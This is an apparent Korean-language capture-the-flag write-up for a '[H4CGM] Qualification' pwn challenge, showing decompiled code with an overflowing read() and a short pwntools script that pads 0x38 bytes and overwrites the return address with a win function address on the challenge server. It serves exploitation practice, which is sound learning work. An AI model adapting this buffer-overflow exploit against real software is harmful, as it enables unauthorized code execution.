[H4CGM] Qualification

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[48]; // [rsp+0h] [rbp-30h] BYREF

  init();
  memset(s, 0, 0x28uLL);
  puts("Do you know pwnable?");
  read(0, s, 0x40uLL);
  return 0;
}

 

main은 이게 전부고

NX만 존재

 

그냥 RET를 win 함수로 바꾸려 BOF하면 된다.

 

0x38까지, SFP를 덮고

0x8을 win함수 주소로 채운다.

 

from pwn import *

p = remote('pwn.h4ckingga.me', 10001)
#p = process('./welcome')
p.recvuntil('?\n')

win = 0x00000000004006c7
payload = 'A'*0x38 + p64(win)

p.send(payload)

p.interactive()

 

언젠진 모르겠는데 이미 풀어뒀더라.. 로컬에선 안 되는데 서버로 제출하니 된다(왜지?)